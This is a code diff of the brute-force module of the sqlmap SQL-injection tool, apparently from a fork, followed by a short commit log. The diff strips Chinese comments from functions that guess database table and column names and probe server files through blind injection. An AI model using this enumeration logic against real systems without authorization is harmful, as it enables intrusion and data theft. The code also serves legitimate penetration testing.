        errMsg = "can't use table existence check because of detected invalid results "
        errMsg += "(most likely caused by inability of the used injection "
        errMsg += "to distinguish erroneous results)"
        raise SqlmapDataException(errMsg)

-    # 将数据库信息推送到kb.injection.data中
    pushValue(conf.db)

-    # 如果数据库信息存在，并且数据库类型为大写，则将数据库信息转换为大写
    if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
        conf.db = conf.db.upper()

-    # 提示用户选择表存在性检查的文件
    message = "which common tables (wordlist) file do you want to use?\n"
    message += "[1] default '%s' (press Enter)\n" % tableFile
    message += "[2] custom"
    choice = readInput(message, default='1')

-    # 如果用户选择自定义文件，则提示用户输入文件路径
    if choice == '2':
        message = "what's the custom common tables file location?\n"
        tableFile = readInput(message) or tableFile

-    # 打印信息，表示正在使用文件进行表存在性检查
    infoMsg = "performing table existence using items from '%s'" % tableFile
    logger.info(infoMsg)

-    # 获取文件中的表名
    tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True)
    tables.extend(_addPageTextWords())
    tables = filterListValue(tables, regex)

-    # 遍历数据库信息
    for conf.db in (conf.db.split(',') if conf.db else [conf.db]):
-        # 如果数据库信息存在，并且不是元数据库，则打印信息
        if conf.db and METADB_SUFFIX not in conf.db:
            infoMsg = "checking database '%s'" % conf.db
            logger.info(infoMsg)

-        # 获取当前线程数据
        threadData = getCurrentThreadData()
        threadData.shared.count = 0
        threadData.shared.limit = len(tables)
        threadData.shared.files = []
        threadData.shared.unique = set()

-        # 定义线程函数
        def tableExistsThread():
            threadData = getCurrentThreadData()

-            # 循环检查表存在性
            while kb.threadContinue:
                kb.locks.count.acquire()
                if threadData.shared.count < threadData.shared.limit:
@ -143,33 +126,28 @@ def tableExists(tableFile, regex=None):
                    kb.locks.count.release()
                    break

-                # 如果数据库信息存在，并且不是元数据库，并且数据库类型不是SQLite、Access、Firebird，则构建完整的表名
                if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
                    fullTableName = "%s.%s" % (conf.db, table)
                else:
                    fullTableName = table

-                # 根据数据库类型，构建表存在性检查的SQL语句
                if Backend.isDbms(DBMS.MCKOI):
                    _ = randomInt(1)
                    result = inject.checkBooleanExpression("%s" % safeStringFormat("%d=(SELECT %d FROM %s)", (_, _, fullTableName)))
                else:
                    result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName)))

-                # 将结果添加到线程数据中
                kb.locks.io.acquire()

                if result and table.lower() not in threadData.shared.unique:
                    threadData.shared.files.append(table)
                    threadData.shared.unique.add(table.lower())

-                    # 如果verbose级别为1或2，并且不是API调用，则打印信息
                    if conf.verbose in (1, 2) and not conf.api:
                        clearConsoleLine(True)
                        infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
                        dataToStdout(infoMsg, True)

-                # 如果verbose级别为1或2，则打印状态信息
                if conf.verbose in (1, 2):
                    status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
                    dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
@ -177,342 +155,225 @@ def tableExists(tableFile, regex=None):
                kb.locks.io.release()

        try:
-            # 尝试运行线程
            runThreads(conf.threads, tableExistsThread, threadChoice=True)
        except KeyboardInterrupt:
-            # 捕获用户中断
            warnMsg = "user aborted during table existence "
            warnMsg += "check. sqlmap will display partial output"
            logger.warning(warnMsg)

-        # 清除控制台行
        clearConsoleLine(True)
-        # 输出换行符
        dataToStdout("\n")

-        # 如果没有找到表
        if not threadData.shared.files:
            warnMsg = "no table(s) found"
-            # 如果指定了数据库
            if conf.db:
                warnMsg += " for database '%s'" % conf.db
            logger.warning(warnMsg)
        else:
-            # 遍历找到的表
            for item in threadData.shared.files:
-                # 如果数据库不在缓存表中
                if conf.db not in kb.data.cachedTables:
-                    # 将表添加到缓存表中
                    kb.data.cachedTables[conf.db] = [item]
                else:
-                    # 否则将表添加到缓存表的列表中
                    kb.data.cachedTables[conf.db].append(item)

-        # 遍历找到的表
        for _ in ((conf.db, item) for item in threadData.shared.files):
-            # 如果表不在暴力破解表中
            if _ not in kb.brute.tables:
-                # 将表添加到暴力破解表中
                kb.brute.tables.append(_)

-    # 从配置中弹出数据库
    conf.db = popValue()
-    # 将暴力破解表写入哈希数据库
    hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True)

-    # 返回缓存表
    return kb.data.cachedTables

 def columnExists(columnFile, regex=None):
-    # 如果没有指定列存在性检查
    if kb.choices.columnExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:
-        # 警告信息
        warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])
        warnMsg += "for common column existence check"
        logger.warning(warnMsg)

-        # 提示用户是否继续
        message = "are you sure you want to continue? [y/N] "
        kb.choices.columnExists = readInput(message, default='N', boolean=True)

-        # 如果用户选择不继续
        if not kb.choices.columnExists:
            return None

-    # 如果没有指定表
    if not conf.tbl:
-        # 抛出缺少表参数异常
        errMsg = "missing table parameter"
        raise SqlmapMissingMandatoryOptionException(errMsg)

-    # 如果指定了数据库并且数据库管理系统是大写的
    if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
-        # 将数据库转换为大写
        conf.db = conf.db.upper()

-    # 注入检查布尔表达式
    result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr())))

-    # 如果结果无效
    if result:
-        # 抛出数据异常
        errMsg = "can't use column existence check because of detected invalid results "
        errMsg += "(most likely caused by inability of the used injection "
        errMsg += "to distinguish erroneous results)"
        raise SqlmapDataException(errMsg)

-    # 提示用户选择列存在性检查文件
    message = "which common columns (wordlist) file do you want to use?\n"
    message += "[1] default '%s' (press Enter)\n" % columnFile
    message += "[2] custom"
    choice = readInput(message, default='1')

-    # 如果用户选择自定义文件
    if choice == '2':
-        # 提示用户输入自定义文件位置
        message = "what's the custom common columns file location?\n"
        columnFile = readInput(message) or columnFile

-    # 输出信息
    infoMsg = "checking column existence using items from '%s'" % columnFile
    logger.info(infoMsg)

-    # 获取文件项
    columns = getFileItems(columnFile, unique=True)
-    # 添加页面文本单词
    columns.extend(_addPageTextWords())
-    # 过滤列表值
    columns = filterListValue(columns, regex)

-    # 获取表名
    table = safeSQLIdentificatorNaming(conf.tbl, True)

-    # 如果指定了数据库并且数据库后缀不在配置中并且数据库管理系统不是SQLite、Access或Firebird
    if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
-        # 将表名转换为数据库表名
        table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)

-    # 设置线程继续
    kb.threadContinue = True
-    # 设置暴力破解模式
    kb.bruteMode = True

-    # 获取当前线程数据
    threadData = getCurrentThreadData()
    threadData.shared.count = 0
    threadData.shared.limit = len(columns)
    threadData.shared.files = []

    def columnExistsThread():
-        # 获取当前线程的数据
        threadData = getCurrentThreadData()

-        # 当kb.threadContinue为True时，循环执行
        while kb.threadContinue:
-            # 获取count锁
            kb.locks.count.acquire()
-            # 如果threadData.shared.count小于threadData.shared.limit
            if threadData.shared.count < threadData.shared.limit:
-                # 获取列名
                column = safeSQLIdentificatorNaming(columns[threadData.shared.count])
-                # 增加计数
                threadData.shared.count += 1
-                # 释放count锁
                kb.locks.count.release()
            else:
-                # 释放count锁
                kb.locks.count.release()
-                # 跳出循环
                break

-            # 如果数据库类型是MCKOI
            if Backend.isDbms(DBMS.MCKOI):
-                # 检查列是否存在
                result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table)))
            else:
-                # 检查列是否存在
                result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))

-            # 获取io锁
            kb.locks.io.acquire()

-            # 如果列存在
            if result:
-                # 将列名添加到threadData.shared.files中
                threadData.shared.files.append(column)

-                # 如果verbose为1或2且不使用api
                if conf.verbose in (1, 2) and not conf.api:
-                    # 清除控制台行
                    clearConsoleLine(True)
-                    # 输出信息
                    infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
                    dataToStdout(infoMsg, True)

-            # 如果verbose为1或2
            if conf.verbose in (1, 2):
-                # 计算状态
                status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
-                # 输出状态
                dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)

-            # 释放io锁
            kb.locks.io.release()

    try:
-        # 运行线程
        runThreads(conf.threads, columnExistsThread, threadChoice=True)
    except KeyboardInterrupt:
-        # 如果用户中断，输出警告信息
        warnMsg = "user aborted during column existence "
        warnMsg += "check. sqlmap will display partial output"
        logger.warning(warnMsg)
    finally:
-        # 将bruteMode设置为False
        kb.bruteMode = False

-    # 清除控制台行
    clearConsoleLine(True)
-    # 输出换行
    dataToStdout("\n")

-    # 如果没有找到列
    if not threadData.shared.files:
-        # 输出警告信息
        warnMsg = "no column(s) found"
        logger.warning(warnMsg)
    else:
-        # 初始化columns字典
        columns = {}

-        # 遍历threadData.shared.files中的列名
        for column in threadData.shared.files:
-            # 如果数据库类型是MySQL
            if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
-                # 检查列是否为数字
                result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column)))
-            # 如果数据库类型是SQLite
            elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,):
-                # 检查列是否为数字
                result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column)))
-            # 如果数据库类型是MCKOI
            elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,):
-                # 检查列是否为数字
                result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table)))
            else:
-                # 检查列是否为数字
                result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))

-            # 如果列是数字
            if result:
-                # 将列名和类型添加到columns字典中
                columns[column] = "numeric"
            else:
-                # 将列名和类型添加到columns字典中
                columns[column] = "non-numeric"

-        # 将columns字典添加到kb.data.cachedColumns中
        kb.data.cachedColumns[conf.db] = {conf.tbl: columns}

-        # 遍历columns字典中的列名和类型
        for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()):
-            # 如果列名和类型不在kb.brute.columns中
            if _ not in kb.brute.columns:
-                # 将列名和类型添加到kb.brute.columns中
                kb.brute.columns.append(_)

-        # 将kb.brute.columns写入hashDB
        hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)

-    # 返回kb.data.cachedColumns
    return kb.data.cachedColumns

@stackedmethod
 def fileExists(pathFile):
-    # 定义一个空列表，用于存储文件路径
    retVal = []

-    # 提示用户选择要使用的公共文件
    message = "which common files file do you want to use?\n"
    message += "[1] default '%s' (press Enter)\n" % pathFile
    message += "[2] custom"
-    # 读取用户输入，默认为1
    choice = readInput(message, default='1')

-    # 如果用户选择自定义文件
    if choice == '2':
-        # 提示用户输入自定义文件路径
        message = "what's the custom common files file location?\n"
        pathFile = readInput(message) or pathFile

-    # 打印检查文件存在的信息
    infoMsg = "checking files existence using items from '%s'" % pathFile
    logger.info(infoMsg)

-    # 获取文件路径列表
    paths = getFileItems(pathFile, unique=True)

-    # 设置暴力模式为True
    kb.bruteMode = True

    try:
-        # 读取随机字符串
        conf.dbmsHandler.readFile(randomStr())
    except SqlmapNoneDataException:
        pass
    except:
-        # 如果发生异常，将暴力模式设置为False
        kb.bruteMode = False
        raise

-    # 获取当前线程数据
    threadData = getCurrentThreadData()
-    # 设置计数器为0
    threadData.shared.count = 0
-    # 设置限制为路径列表的长度
    threadData.shared.limit = len(paths)
-    # 创建一个空列表，用于存储文件
    threadData.shared.files = []

-    # 定义一个线程函数，用于检查文件是否存在
    def fileExistsThread():
-        # 获取当前线程数据
        threadData = getCurrentThreadData()

-        # 当线程继续时
        while kb.threadContinue:
-            # 获取计数器的锁
            kb.locks.count.acquire()
-            # 如果计数器小于限制
            if threadData.shared.count < threadData.shared.limit:
-                # 获取路径
                path = ntToPosixSlashes(paths[threadData.shared.count])
-                # 计数器加1
                threadData.shared.count += 1
-                # 释放计数器的锁
                kb.locks.count.release()
            else:
-                # 释放计数器的锁
                kb.locks.count.release()
-                # 跳出循环
                break

            try:
-                # 读取路径
                result = unArrayizeValue(conf.dbmsHandler.readFile(path))
            except SqlmapNoneDataException:
-                # 如果没有数据，将结果设置为None
                result = None

-            # 获取IO的锁
            kb.locks.io.acquire()

-            # 如果结果不是None
            if not isNoneValue(result):
-                # 将结果添加到文件列表中
                threadData.shared.files.append(result)

-                # 如果不是API模式
                if not conf.api:
                    clearConsoleLine(True)
                    infoMsg = "[%s] [INFO] retrieved: '%s'\n" % (time.strftime("%X"), path)
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
snh	4411acd5bb	1	2 months ago
snh	57f5840b20	改	2 months ago
snh	28f0660564	beautifulsoup	2 months ago
snh	c7e9d5a257	ansistrm修改	2 months ago
wang	e749525df1	修改win	2 months ago
liguanwei	87f1fc758c	sunninghao_change	2 months ago
liguanwei	8b01ccc517	sunninghao_change	2 months ago
liguanwei	8bdbb8a295	sunninghao_change	2 months ago
snh	f31505947f	识别和显示日志消息中的文件类型	4 months ago
snh	831fb4611e	结果输出终端的颜色显示	4 months ago